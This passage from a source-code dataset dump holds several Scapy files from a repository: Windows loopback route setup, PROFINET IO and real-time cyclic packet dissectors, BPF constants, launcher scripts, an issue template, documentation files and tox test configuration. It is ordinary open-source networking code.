LOOPBACK_NAME interface\n for devname, iface in list(IFACES.items()):\n if iface.name == scapy.consts.LOOPBACK_NAME:\n IFACES.pop(devname)\n # Inject interface\n IFACES[\"{0XX00000-X000-0X0X-X00X-00XXXX000XXX}\"] = adapter\n scapy.consts.LOOPBACK_INTERFACE = adapter\n if isinstance(conf.iface, NetworkInterface):\n if conf.iface.name == LOOPBACK_NAME:\n conf.iface = adapter\n if isinstance(conf.iface6, NetworkInterface):\n if conf.iface6.name == LOOPBACK_NAME:\n conf.iface6 = adapter\n # Build the packed network addresses\n loop_net = struct.unpack(\"!I\", socket.inet_aton(\"127.0.0.0\"))[0]\n loop_mask = struct.unpack(\"!I\", socket.inet_aton(\"255.0.0.0\"))[0]\n # Build the fake routes\n loopback_route = (loop_net, loop_mask, \"0.0.0.0\", adapter, \"127.0.0.1\", 1)\n loopback_route6 = ('::1', 128, '::', adapter, [\"::1\"], 1)\n loopback_route6_custom = (\"fe80::\", 128, \"::\", adapter, [\"::1\"], 1)\n if routes is None:\n # Injection\n conf.route6.routes.append(loopback_route6)\n conf.route6.routes.append(loopback_route6_custom)\n conf.route.routes.append(loopback_route)\n # Flush the caches\n conf.route6.invalidate_cache()\n conf.route.invalidate_cache()\n else:\n if ipv6:\n routes.append(loopback_route6)\n routes.append(loopback_route6_custom)\n else:\n routes.append(loopback_route)\n\n\nif not conf.use_winpcapy:\n\n class NotAvailableSocket(SuperSocket):\n desc = \"wpcap.dll missing\"\n\n def __init__(self, *args, **kargs):\n raise RuntimeError(\"Sniffing and sending packets is not available: \"\n \"winpcap is not installed\")\n\n conf.L2socket = NotAvailableSocket\n conf.L2listen = NotAvailableSocket\n conf.L3socket = NotAvailableSocket\n" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.7379999756813049, "avg_line_length": 37.46154022216797, "blob_id": "0852ce99bfdb3401e94f18b56e82cc80cb8f6786", "content_id": "fd51da47570468571d7276a34431acaf50fb73f0", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 1500, "license_type": "permissive", "max_line_length": 246, "num_lines": 39, "path": "/scapy/.github/ISSUE_TEMPLATE.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#### Things to consider\n\n1. Please check that you are using the latest scapy version, e.g. installed via:\n\n `pip install https://github.com/secdev/scapy`\n\n2. If you are here to ask a question - please check previous issues and online resources, and consider using gitter instead: https://gitter.im/secdev/scapy\n\n3. Please understand that **this is not a forum** but an issue tracker. The following article explains why you should limit questions asked on Github issues: https://medium.com/@methane/why-you-must-not-ask-questions-on-github-issues-51d741d83fde\n\n#### Brief description\n\n< describe the main issue in one sentence >\n\n< if possible, describe what components / protocols could be affected by the issue (e.g. wrpcap() + IPv6, it is likely this also affects XXX) >\n\n#### Environment\n\n- Scapy version: < scapy version and/or commit-hash >\n- Python version: < e.g. 3.5 >\n- Operating System: < e.g. Minix 3.4 >\n\n< if needed - further information to get a picture of your setup (e.g. a sketch of your network setup) >\n\n#### How to reproduce\n\n< step-by-step explanation or a short script, may reference section 'Related resources' >\n\n#### Actual result\n\n< dump results that outline the issue, please format your code >\n\n#### Expected result\n\n< describe the expected result and outline the difference to the actual one, could also be a screen shot (e.g. wireshark) >\n\n#### Related resources\n\n< traces / sample pcaps (stripped to the relevant frames), related standards, RFCs or other resources >\n" }, { "alpha_fraction": 0.7177419066429138, "alphanum_fraction": 0.725806474685669, "avg_line_length": 23.799999237060547, "blob_id": "fff71d9d993bab400919f3540491922f1ee34d06", "content_id": "7256d5de7599418274145f8a05ffeb12c0742000", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 124, "license_type": "permissive", "max_line_length": 40, "num_lines": 5, "path": "/scapy/run_scapy", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nDIR=$(dirname $0)\nPYTHONDONTWRITEBYTECODE=True\nPYTHON=${PYTHON:-python}\nPYTHONPATH=$DIR exec $PYTHON -m scapy $@\n" }, { "alpha_fraction": 0.6332813501358032, "alphanum_fraction": 0.6784878969192505, "avg_line_length": 31.075000762939453, "blob_id": "d53a78762cd24fa019adf66bbcbb52b8c9f4c2b0", "content_id": "9b47427fd949949ce01ffb742701eb863a26cc22", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2566, "license_type": "permissive", "max_line_length": 76, "num_lines": 80, "path": "/scapy/scapy/contrib/pnio.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# Scapy is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# any later version.\n#\n# Scapy is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Scapy. If not, see <http://www.gnu.org/licenses/>.\n\n# Copyright (C) 2016 Gauthier Sebaux\n\n# scapy.contrib.description = ProfinetIO base layer\n# scapy.contrib.status = loads\n\n\"\"\"\nA simple and non exhaustive Profinet IO layer for scapy\n\"\"\"\n\n# Scapy imports\nfrom __future__ import absolute_import\nfrom scapy.all import Packet, bind_layers, Ether, UDP\nfrom scapy.fields import XShortEnumField\nfrom scapy.modules.six.moves import range\n\n# Some constants\nPNIO_FRAME_IDS = {\n 0x0020: \"PTCP-RTSyncPDU-followup\",\n 0x0080: \"PTCP-RTSyncPDU\",\n 0xFC01: \"Alarm High\",\n 0xFE01: \"Alarm Low\",\n 0xFEFC: \"DCP-Hello-Req\",\n 0xFEFD: \"DCP-Get-Set\",\n 0xFEFE: \"DCP-Identify-ReqPDU\",\n 0xFEFF: \"DCP-Identify-ResPDU\",\n 0xFF00: \"PTCP-AnnouncePDU\",\n 0xFF20: \"PTCP-FollowUpPDU\",\n 0xFF40: \"PTCP-DelayReqPDU\",\n 0xFF41: \"PTCP-DelayResPDU-followup\",\n 0xFF42: \"PTCP-DelayFuResPDU\",\n 0xFF43: \"PTCP-DelayResPDU\",\n}\nfor i in range(0x0100, 0x1000):\n PNIO_FRAME_IDS[i] = \"RT_CLASS_3\"\nfor i in range(0x8000, 0xC000):\n PNIO_FRAME_IDS[i] = \"RT_CLASS_1\"\nfor i in range(0xC000, 0xFC00):\n PNIO_FRAME_IDS[i] = \"RT_CLASS_UDP\"\nfor i in range(0xFF80, 0xFF90):\n PNIO_FRAME_IDS[i] = \"FragmentationFrameID\"\n\n#################\n# PROFINET IO #\n#################\n\n\nclass ProfinetIO(Packet):\n \"\"\"Basic PROFINET IO dispatcher\"\"\"\n fields_desc = [XShortEnumField(\"frameID\", 0, PNIO_FRAME_IDS)]\n overload_fields = {\n Ether: {\"type\": 0x8892},\n UDP: {\"dport\": 0x8892},\n }\n\n def guess_payload_class(self, payload):\n # For frameID in the RT_CLASS_* range, use the RTC packet as payload\n if (self.frameID >= 0x0100 and self.frameID < 0x1000) or \\\n (self.frameID >= 0x8000 and self.frameID < 0xFC00):\n from scapy.contrib.pnio_rtc import PNIORealTime\n return PNIORealTime\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nbind_layers(Ether, ProfinetIO, type=0x8892)\nbind_layers(UDP, ProfinetIO, dport=0x8892)\n" }, { "alpha_fraction": 0.6430678367614746, "alphanum_fraction": 0.7817109227180481, "avg_line_length": 36.55555725097656, "blob_id": "0856933d8ec308a9bc6fd3c90f2b1db96ca1c7e6", "content_id": "c1104c84c6945b384ce97662972a205dfae8dd1a", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 339, "license_type": "permissive", "max_line_length": 97, "num_lines": 9, "path": "/scapy/.travis/pylibpcap.rb", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "class Pylibpcap <Formula\n url \"http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.gz\"\n homepage \"http://pylibpcap.sourceforge.net/\"\n sha256 \"cfc365f2707a7986496acacf71789fef932a5ddbeaa36274cc8f9834831ca3b1\"\n \n def install\n system \"python\", *Language::Python.setup_install_args(prefix)\n end\nend\n\n" }, { "alpha_fraction": 0.5302325487136841, "alphanum_fraction": 0.7674418687820435, "avg_line_length": 16.200000762939453, "blob_id": "1870c09387c6af152b0d7fa118542ef39c3978b0", "content_id": "1e41bd3918a4e708796e60f5f0c94a3dcd99c32b", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "permissive", "max_line_length": 37, "num_lines": 25, "path": "/scapy/scapy/arch/bpf/consts.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# Guillaume Valadon <guillaume@valadon.net>\n\n\"\"\"\nScapy *BSD native support - constants\n\"\"\"\n\n\nfrom scapy.data import MTU\n\n\nSIOCGIFFLAGS = 0xc0206911\nBPF_BUFFER_LENGTH = MTU\n\n# From net/bpf.h\nBIOCIMMEDIATE = 0x80044270\nBIOCGSTATS = 0x4008426f\nBIOCPROMISC = 0x20004269\nBIOCSETIF = 0x8020426c\nBIOCSBLEN = 0xc0044266\nBIOCGBLEN = 0x40044266\nBIOCSETF = 0x80104267\nBIOCSDLT = 0x80044278\nBIOCSHDRCMPLT = 0x80044275\nBIOCGDLT = 0x4004426a\nDLT_IEEE802_11_RADIO = 127\n" }, { "alpha_fraction": 0.5739399790763855, "alphanum_fraction": 0.5800139904022217, "avg_line_length": 33.87168884277344, "blob_id": "0886624dfd9486dc3b92e400d4af1e45cf1e8080", "content_id": "eed7ca69e3c8294a61aeba5e9a58d39357ea48f4", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17122, "license_type": "permissive", "max_line_length": 115, "num_lines": 491, "path": "/scapy/scapy/contrib/pnio_rtc.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# Scapy is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# any later version.\n#\n# Scapy is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Scapy. If not, see <http://www.gnu.org/licenses/>.\n\n# Copyright (C) 2016 Gauthier Sebaux\n\n# scapy.contrib.description = ProfinetIO Real-Time Cyclic (RTC)\n# scapy.contrib.status = loads\n\n\"\"\"\nPROFINET IO layers for scapy which correspond to Real-Time Cyclic data\n\"\"\"\n\n# external imports\nfrom __future__ import absolute_import\nimport math\nimport struct\n\n# Scapy imports\nfrom scapy.all import Packet, bind_layers, Ether, UDP, Field, conf\nfrom scapy.fields import BitEnumField, BitField, ByteField,\\\n FlagsField,\\\n PacketListField,\\\n ShortField, StrFixedLenField,\\\n XBitField, XByteField\n\n# local imports\nfrom scapy.contrib.pnio import ProfinetIO\nfrom scapy.compat import orb\nfrom scapy.modules.six.moves import range\n\n\n#####################################\n# PROFINET Real-Time Data Packets #\n#####################################\n\nclass PNIORealTimeIOxS(Packet):\n \"\"\"IOCS and IOPS packets for PROFINET Real-Time payload\"\"\"\n name = \"PNIO RTC IOxS\"\n fields_desc = [\n BitEnumField(\"dataState\", 1, 1, [\"bad\", \"good\"]),\n BitEnumField(\"instance\", 0, 2, [\"subslot\", \"slot\", \"device\", \"controller\"]),\n XBitField(\"reserved\", 0, 4),\n BitField(\"extension\", 0, 1),\n ]\n\n def extract_padding(self, s):\n return None, s # No extra payload\n\n\nclass PNIORealTimeRawData(Packet):\n \"\"\"Raw data packets for PROFINET Real-Time payload.\n\n It's a configurable packet whose config only includes a fix length. The\n config parameter must then be a dict {\"length\": X}.\n\n PROFINET IO specification impose this packet to be followed with an IOPS\n (PNIORealTimeIOxS)\"\"\"\n __slots__ = [\"_config\"]\n name = \"PNIO RTC Raw data\"\n fields_desc = [\n StrFixedLenField(\"load\", \"\", length_from=lambda p: p[PNIORealTimeRawData].length()),\n ]\n\n def __init__(self, _pkt=\"\", post_transform=None, _internal=0, _underlayer=None, config=None, **fields):\n \"\"\"\n length=None means that the length must be managed by the user. If it's\n defined, the field will always be length-long (padded with b\"\\\\x00\" if\n needed)\n \"\"\"\n self._config = config\n Packet.__init__(self, _pkt=_pkt, post_transform=post_transform,\n _internal=_internal, _underlayer=_underlayer, **fields)\n\n def copy(self):\n pkt = Packet.copy(self)\n pkt._config = self._config\n return pkt\n\n def clone_with(self, *args, **kargs):\n pkt = Packet.clone_with(self, *args, **kargs)\n pkt._config = self._config\n return pkt\n\n def length(self):\n \"\"\"Get the length of the raw data\"\"\"\n # Manage the length of the packet if a length is provided\n return self._config[\"length\"]\n\n\n# Make sure an IOPS follows a data\nbind_layers(PNIORealTimeRawData, PNIORealTimeIOxS)\n\n\n###############################\n# PROFINET Real-Time Fields #\n###############################\n\nclass LowerLayerBoundPacketListField(PacketListField):\n \"\"\"PacketList which binds each underlayer of packets to the current pkt\"\"\"\n\n def m2i(self, pkt, m):\n return self.cls(m, _underlayer=pkt)\n\n\nclass NotionalLenField(Field):\n \"\"\"A len fields which isn't present in the machine representation, but is\n computed from a given lambda\"\"\"\n __slots__ = [\"length_from\", \"count_from\"]\n\n def __init__(self, name, default, length_from=None, count_from=None):\n Field.__init__(self, name, default)\n self.length_from = length_from\n self.count_from = count_from\n\n def addfield(self, pkt, s, val):\n return s # Isn't present in the machine packet\n\n def getfield(self, pkt, s):\n val = None\n if self.length_from is not None:\n val = self.length_from(pkt, s)\n elif self.count_from is not None:\n val = self.count_from(pkt, s)\n return s, val\n\n\n###############################\n# PNIORealTime Configuration #\n###############################\n\n# conf.contribs[\"PNIO_RTC\"] is a dict which contains data layout for each Ethernet\n# communications. It must be formatted as such:\n# {(Ether.src, Ether.dst): [(start, type, config), ...]}\n# start: index of a data field from the END of the data buffer (-1, -2, ...)\n# type: class to be instanciated to represent these data\n# config: a config dict, given to the type class constructor\nconf.contribs[\"PNIO_RTC\"] = {}\n\n\ndef _get_ethernet(pkt):\n \"\"\"Find the Ethernet packet of underlayer or None\"\"\"\n ether = pkt\n while ether is not None and not isinstance(ether, Ether):\n ether = ether.underlayer\n return ether\n\n\ndef pnio_update_config(config):\n \"\"\"Update the PNIO RTC config\"\"\"\n conf.contribs[\"PNIO_RTC\"].update(config)\n\n\ndef pnio_get_config(pkt):\n \"\"\"Retrieve the config for a given communication\"\"\"\n # get the config based on the tuple (Ether.src, Ether.dst)\n ether = _get_ethernet(pkt)\n config = None\n if ether is not None and (ether.src, ether.dst) in conf.contribs[\"PNIO_RTC\"]:\n config = conf.contribs[\"PNIO_RTC\"][(ether.src, ether.dst)]\n\n return config\n\n\n###############################\n# PROFINET Real-Time Packet #\n###############################\n\ndef _pnio_rtc_guess_payload_class(_pkt, _underlayer=None, *args, **kargs):\n \"\"\"A dispatcher for the packet list field which manage the configuration\n to fin dthe appropriate class\"\"\"\n config = pnio_get_config(_underlayer)\n\n if isinstance(config, list):\n # If we have a valid config, it's a list which describe each data\n # packets the rest being IOCS\n cur_index = -len(_pkt)\n for index, cls, params in config:\n if cur_index == index:\n return cls(_pkt, config=params, *args, **kargs)\n\n # Not a data => IOCS packet\n return PNIORealTimeIOxS(_pkt, *args, **kargs)\n else:\n # No config => Raw data which dissect the whole _pkt\n return PNIORealTimeRawData(_pkt,\n config={\"length\": len(_pkt)},\n *args, **kargs\n )\n\n\n_PNIO_DS_FLAGS = [\n \"primary\",\n \"redundancy\",\n \"validData\",\n \"reserved_1\",\n \"run\",\n \"no_problem\",\n \"reserved_2\",\n \"ignore\",\n]\n\n\nclass PNIORealTime(Packet):\n \"\"\"PROFINET cyclic real-time\"\"\"\n name = \"PROFINET Real-Time\"\n fields_desc = [\n NotionalLenField(\"len\", None, length_from=lambda p, s: len(s)),\n NotionalLenField(\"dataLen\", None, length_from=lambda p, s: len(s[:-4].rstrip(b\"\\0\"))),\n LowerLayerBoundPacketListField(\"data\", [], _pnio_rtc_guess_payload_class, length_from=lambda p: p.dataLen),\n StrFixedLenField(\"padding\", \"\", length_from=lambda p: p[PNIORealTime].padding_length()),\n ShortField(\"cycleCounter\", 0),\n FlagsField(\"dataStatus\", 0x35, 8, _PNIO_DS_FLAGS),\n ByteField(\"transferStatus\", 0)\n ]\n overload_fields = {\n ProfinetIO: {\"frameID\": 0x8000}, # RT_CLASS_1\n }\n\n def padding_length(self):\n \"\"\"Compute the length of the padding need for the ethernet frame\"\"\"\n fld, val = self.getfield_and_val(\"data\")\n\n # use the len field if available to define the padding length, eg for\n # dissected packets\n pkt_len = self.getfieldval(\"len\")\n if pkt_len is not None:\n return max(0, pkt_len - len(fld.addfield(self, b\"\", val)) - 4)\n\n if isinstance(self.underlayer, ProfinetIO) and \\\n isinstance(self.underlayer.underlayer, UDP):\n return max(0, 12 - len(fld.addfield(self, b\"\", val)))\n else:\n return max(0, 40 - len(fld.addfield(self, b\"\", val)))\n\n @staticmethod\n def analyse_data(packets):\n \"\"\"Analyse the data to find heuristical properties and determine\n location and type of data\"\"\"\n loc = PNIORealTime.find_data(packets)\n loc = PNIORealTime.analyse_profisafe(packets, loc)\n pnio_update_config(loc)\n return loc\n\n @staticmethod\n def find_data(packets):\n \"\"\"Analyse a packet list to extract data offsets from packets data.\"\"\"\n # a dictionary to count data offsets (ie != 0x80)\n # It's formatted: {(src, dst): (total, [count for offset in len])}\n heuristic = {}\n\n # Counts possible data locations\n # 0x80 are mainly IOxS and trailling 0x00s are just padding\n for pkt in packets:\n if PNIORealTime in pkt:\n pdu = bytes(pkt[PNIORealTime])[:-4].rstrip(b\"\\0\")\n\n if (pkt.src, pkt.dst) not in heuristic:\n heuristic[(pkt.src, pkt.dst)] = (0, [])\n\n total, counts = heuristic[(pkt.src, pkt.dst)]\n\n if len(counts) < len(pdu):\n counts.extend([0 for _ in range(len(pdu) - len(counts))])\n\n for i in range(len(pdu)):\n if orb(pdu[i]) != 0x80:\n counts[i] += 1\n\n comm = (pkt.src, pkt.dst)\n heuristic[comm] = (total + 1, counts)\n\n # Determine data locations\n locations = {}\n for comm in heuristic:\n total, counts = heuristic[comm]\n length = len(counts)\n loc = locations[comm] = []\n start = None\n for i in range(length):\n if counts[i] > total // 2: # Data if more than half is != 0x80\n if start is None:\n start = i\n else:\n if start is not None:\n loc.append((\n start - length,\n PNIORealTimeRawData,\n {\"length\": i - start}\n ))\n start = None\n\n return locations\n\n @staticmethod\n def analyse_profisafe(packets, locations=None):\n \"\"\"Analyse a packet list to find possible PROFISafe profils.\n\n It's based on an heuristical analysis of each payload to try to find\n CRC and control/status byte.\n\n locations: possible data locations. If not provided, analyse_pn_rt will\n be called beforehand. If not given, it calls in the same time\n analyse_data which update the configuration of the data field\"\"\"\n # get data locations and entropy of bytes\n if not locations:\n locations = PNIORealTime.find_data(packets)\n entropies = PNIORealTime.data_entropy(packets, locations)\n\n # Try to find at least 3 high entropy successive bytes (the CRC)\n for comm in entropies:\n entropy = dict(entropies[comm]) # Convert tuples to key => value\n\n for i in range(len(locations[comm])):\n # update each location with its value after profisafe analysis\n locations[comm][i] = \\\n PNIORealTime.analyse_one_profisafe_location(\n locations[comm][i], entropy\n )\n\n return locations\n\n @staticmethod\n def analyse_one_profisafe_location(location, entropy):\n \"\"\"Analyse one PNIO RTC data location to find if its a PROFISafe\n\n :param location: location to analyse, a tuple (start, type, config)\n :param entropy: the entropy of each byte of the packet data\n :returns: the configuration associated with the data\n \"\"\"\n start, klass, conf = location\n if conf[\"length\"] >= 4: # Minimal PROFISafe length\n succ_count = 0\n for j in range(start, start + conf[\"length\"]):\n # Limit for a CRC is set to 6 bit of entropy min\n if j in entropy and entropy[j] >= 6:\n succ_count += 1\n else:\n succ_count = 0\n # PROFISafe profiles must end with at least 3 bytes of high entropy\n if succ_count >= 3: # Possible profisafe CRC\n return (\n start,\n Profisafe,\n {\"CRC\": succ_count, \"length\": conf[\"length\"]}\n )\n # Not a PROFISafe profile\n return (start, klass, conf)\n\n @staticmethod\n def data_entropy(packets, locations=None):\n \"\"\"Analyse a packet list to find the entropy of each data byte\n\n locations: possible data locations. If not provided, analyse_pn_rt will\n be called beforehand. If not given, it calls in the same time\n analyse_data which update the configuration of the data field\"\"\"\n if not locations:\n locations = PNIORealTime.find_data(packets)\n\n # Retrieve the entropy of each data byte, for each communication\n entropies = {}\n for comm in locations:\n if len(locations[comm]) > 0: # Doesn't append empty data\n entropies[comm] = []\n comm_packets = []\n\n # fetch all packets from the communication\n for pkt in packets:\n if PNIORealTime in pkt and (pkt.src, pkt.dst) == comm:\n comm_packets.append(\n bytes(pkt[PNIORealTime])[:-4].rstrip(b\"\\0\")\n )\n\n # Get the entropy\n for start, dummy, config in locations[comm]:\n for i in range(start, start + config[\"length\"]):\n entropies[comm].append(\n (i, entropy_of_byte(comm_packets, i))\n )\n\n return entropies\n\n @staticmethod\n def draw_entropy(packets, locations=None):\n \"\"\"Plot the entropy of each data byte of PN RT communication\"\"\"\n import matplotlib.pyplot as plt\n import matplotlib.cm as cm\n entropies = PNIORealTime.data_entropy(packets, locations)\n\n rows = len(entropies)\n cur_row = 1\n for comm in entropies:\n index = []\n vals = []\n for i, ent in entropies[comm]:\n index.append(i)\n vals.append(ent)\n\n # Offsets the indexes to get the index from the beginning\n offset = -min(index)\n index = [i + offset for i in index]\n\n plt.subplot(rows, 1, cur_row)\n plt.bar(index, vals, 0.8, color=\"r\")\n plt.xticks([i + 0.4 for i in index], index)\n plt.title(\"Entropy from %s to %s\" % comm)\n cur_row += 1\n plt.ylabel(\"Shannon Entropy\")\n\n plt.xlabel(\"Byte offset\") # x label only on the last row\n plt.legend()\n\n plt.tight_layout()\n plt.show()\n\n\ndef entropy_of_byte(packets, position):\n \"\"\"Compute the entropy of a byte at a given offset\"\"\"\n counter = [0 for _ in range(256)]\n\n # Count each byte a appearance\n for pkt in packets:\n if -position <= len(pkt): # position must be a negative index\n counter[orb(pkt[position])] += 1\n\n # Compute the Shannon entropy\n entropy = 0\n length = len(packets)\n for count in counter:\n if count > 0:\n ratio = float(count) / length\n entropy -= ratio * math.log(ratio, 2)\n\n return entropy\n\n###############\n# PROFISafe #\n###############\n\n\nclass XVarBytesField(XByteField):\n \"\"\"Variable length bytes field, from 0 to 8 bytes\"\"\"\n __slots__ = [\"length_from\"]\n\n def __init__(self, name, default, length=None, length_from=None):\n self.length_from = length_from\n if length:\n self.length_from = lambda p, l=length: l\n Field.__init__(self, name, default, \"!Q\")\n\n def addfield(self, pkt, s, val):\n length = self.length_from(pkt)\n return s + struct.pack(self.fmt, self.i2m(pkt, val))[8 - length:]\n\n def getfield(self, pkt, s):\n length = self.length_from(pkt)\n val = struct.unpack(self.fmt, b\"\\x00\" * (8 - length) + s[:length])[0]\n return s[length:], self.m2i(pkt, val)\n\n\nclass Profisafe(PNIORealTimeRawData):\n \"\"\"PROFISafe profil to be encapsulated inside the PNRT.data list.\n\n It's a configurable packet whose config includes a fix length, and a CRC\n length. The config parameter must then be a dict {\"length\": X, \"CRC\": Y}.\n \"\"\"\n name = \"PROFISafe\"\n fields_desc = [\n StrFixedLenField(\"load\", \"\", length_from=lambda p: p[Profisafe].data_length()),\n XByteField(\"Control_Status\", 0),\n XVarBytesField(\"CRC\", 0, length_from=lambda p: p[Profisafe].crc_length())\n ]\n\n def data_length(self):\n \"\"\"Return the length of the data\"\"\"\n ret = self.length() - self.crc_length() - 1\n return ret\n\n def crc_length(self):\n \"\"\"Return the length of the crc\"\"\"\n return self._config[\"CRC\"]\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18, "blob_id": "b71aeeef54dd16cfa5629997a924cbdfcc81af94", "content_id": "6f983c7a7f072976606f936850d4ddd4c6efbecd", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 57, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/scapy/run_scapy_py3", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nPYTHON=python3\n. $(dirname $0)/run_scapy \"$@\"\n" }, { "alpha_fraction": 0.6525307893753052, "alphanum_fraction": 0.6771546006202698, "avg_line_length": 21.78125, "blob_id": "545f146b43378a43c594abb674397717ef07c845", "content_id": "d7af30b880daa8983b04ff52c5d316c8b1706407", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 731, "license_type": "permissive", "max_line_length": 93, "num_lines": 32, "path": "/scapy/doc/scapy/index.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": ".. Scapy documentation master file, created by sphinx-quickstart on Mon Sep 8 19:37:39 2008.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to Scapy's documentation!\n=================================\n\n.. image:: graphics/scapy_logo.png\n :scale: 20\n :align: center\n\n:Release: |version|\n:Date: |today|\n\nThis document is under a `Creative Commons Attribution - Non-Commercial \n- Share Alike 2.5 <http://creativecommons.org/licenses/by-nc-sa/2.5/>`_ license.\n\n.. toctree::\n :maxdepth: 2\n \n introduction\n installation\n \n usage\n advanced_usage\n extending\n build_dissect\n functions\n\n troubleshooting\n development\n backmatter\n \n" }, { "alpha_fraction": 0.7300000190734863, "alphanum_fraction": 0.7300000190734863, "avg_line_length": 43.33333206176758, "blob_id": "5b7cbaed4df368c46b8a92749082529b2421e138", "content_id": "f316bb2a879cc3bfc8ec4c8c2aa1ba557e68440f", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 400, "license_type": "permissive", "max_line_length": 82, "num_lines": 9, "path": "/scapy/doc/scapy/backmatter.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "\n*********\nCredits\n*********\n\n- Philippe Biondi is Scapy's author. He has also written most of the documentation.\n- Pierre Lalet, Gabriel Potter, Guillaume Valadon are the current most active maintainers and contributors.\n- Fred Raynal wrote the chapter on building and dissecting packets.\n- Peter Kacherginsky contributed several tutorial sections, one-liners and recipes.\n- Dirk Loss integrated and restructured the existing docs to make this book.\n" }, { "alpha_fraction": 0.680196225643158, "alphanum_fraction": 0.7087422013282776, "avg_line_length": 32.46268844604492, "blob_id": "4c449395ceef504c5e18f7ed9a239c275b017330", "content_id": "97374c06a34cad5a767c6557226026e204f54e16", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 2242, "license_type": "permissive", "max_line_length": 189, "num_lines": 67, "path": "/scapy/tox.ini", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# Scapy tox configuration file\n# Copyright (C) 2018 Guillaume Valadon <guillaume@valadon.net>\n\n\n[tox]\nenvlist = py{27,34,35,36,py,py3}-{linux,osx}_{non_root,root}\nskip_missing_interpreters = true\nminversion = 2.9\n\n\n[testenv:py27-pcapdnet_root]\ndescription = \"Scapy unit tests - pcap & dnet\"\nwhitelist_externals = {[testenv]whitelist_externals}\nsetenv = {[testenv]setenv}\npassenv = SCAPY_USE_PCAPDNET\ndeps = mock\n cryptography\n coverage\n # Currently pcap & dnet are tested together. As pydumbnet does not\n # support Python3 yet, both are currently disabled.\n pcapy>=0.11.3\n pydumbnet\ncommands =\n sudo -E {envpython} -m coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c ./test/configs/osx.utsc -T test/bpf.uts -K manufdb -K tshark -K random_weird_py3 -K osx {posargs}\n\n\n[testenv]\ndescription = \"Scapy unit tests\"\nwhitelist_externals = sudo\nsetenv = SCAPY_ROOT_DIR={env:PWD}\ndeps = mock\n {py27,py34,py35,py36}: cryptography\n coverage\n python-can\n\nplatform =\n linux_non_root,linux_root: linux\n osx_non_root,osx_root: darwin\n\ncommands =\n linux_non_root: coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 -K netaccess -K needs_root {posargs}\n linux_root: sudo -E {envpython} -m coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs}\n osx_non_root: coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c test/configs/osx.utsc -K manufdb -K tshark -K random_weird_py3 -K netaccess -K needs_root {posargs}\n osx_root: sudo -E {envpython} -m coverage run --rcfile=.coveragerc.tox -a -m scapy.tools.UTscapy -c test/configs/osx.utsc -K manufdb -K tshark -K random_weird_py3 {posargs}\n coverage 